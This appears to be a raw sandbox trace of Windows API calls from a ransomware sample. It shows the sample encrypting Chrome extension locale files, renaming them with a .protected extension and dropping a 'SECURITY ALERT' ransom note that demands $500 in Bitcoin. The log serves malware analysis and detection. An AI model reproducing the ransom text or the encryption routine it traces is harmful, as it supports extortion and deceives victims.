returned 1 [0079.224] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.224] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.224] CloseHandle (hObject=0x164) returned 1 [0079.224] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.224] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0079.224] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0079.224] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0079.224] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0079.224] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0079.224] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs") returned 142 [0079.224] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0079.224] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0079.224] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\*") returned 144 [0079.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.224] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.224] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.225] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.225] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.225] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.225] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\.") returned 144 [0079.225] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.225] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.225] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.225] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.225] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.225] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.225] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.225] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\..") returned 145 [0079.225] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.225] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.225] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.225] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.225] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.225] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") 
returned -1 [0079.225] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.225] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.225] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json") returned 156 [0079.225] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.225] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.225] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.225] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.226] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json") returned 156 [0079.226] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.226] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json") returned 156 [0079.226] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.226] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json") returned 156 [0079.226] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.226] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x103, lpOverlapped=0x0) returned 1 [0079.227] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.227] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x103, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x103, lpOverlapped=0x0) returned 1 [0079.227] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.227] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.227] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.227] CloseHandle (hObject=0x168) returned 1 [0079.228] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.protected") returned 166 [0079.228] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.protected")) returned 1 [0079.228] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.228] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.228] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\RESTORE_FILES.txt") returned 160 [0079.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.229] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.229] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.230] lstrlenA (lpString="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") returned 684 [0079.230] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.230] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.230] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.230] CloseHandle (hObject=0x164) returned 1 [0079.230] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.230] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0079.230] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0079.230] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0079.230] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0079.230] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 [0079.230] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da") returned 142 [0079.230] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0079.230] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0079.230] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\*") returned 144 [0079.230] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.230] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.230] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.230] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.230] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.231] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.231] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\.") returned 144 [0079.231] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.231] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.231] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.231] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.231] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.231] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.231] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.231] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\..") returned 145 [0079.231] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.231] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.231] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.231] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.231] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.231] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") 
returned -1 [0079.231] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.231] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.231] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json") returned 156 [0079.231] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.231] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.231] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.231] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.232] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json") returned 156 [0079.232] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.232] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json") returned 156 [0079.232] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.232] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json") returned 156 [0079.232] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.232] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf3, lpOverlapped=0x0) returned 1 [0079.233] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.233] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf3, lpOverlapped=0x0) returned 1 [0079.233] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.234] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.234] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.234] CloseHandle (hObject=0x168) returned 1 [0079.234] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.protected") returned 166 [0079.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.protected")) returned 1 [0079.235] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.235] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.235] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\RESTORE_FILES.txt") returned 160 [0079.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.235] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.235] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.236] lstrlenA (lpString="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") returned 684 [0079.236] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.236] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.236] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.236] CloseHandle (hObject=0x164) returned 1 [0079.236] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.236] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0079.237] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0079.237] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0079.237] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0079.237] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0079.237] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de") returned 142 [0079.237] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0079.237] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0079.237] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\*") returned 144 [0079.237] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.237] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.237] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.237] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.237] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.237] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.237] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\.") returned 144 [0079.237] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.237] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.237] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.237] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.237] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 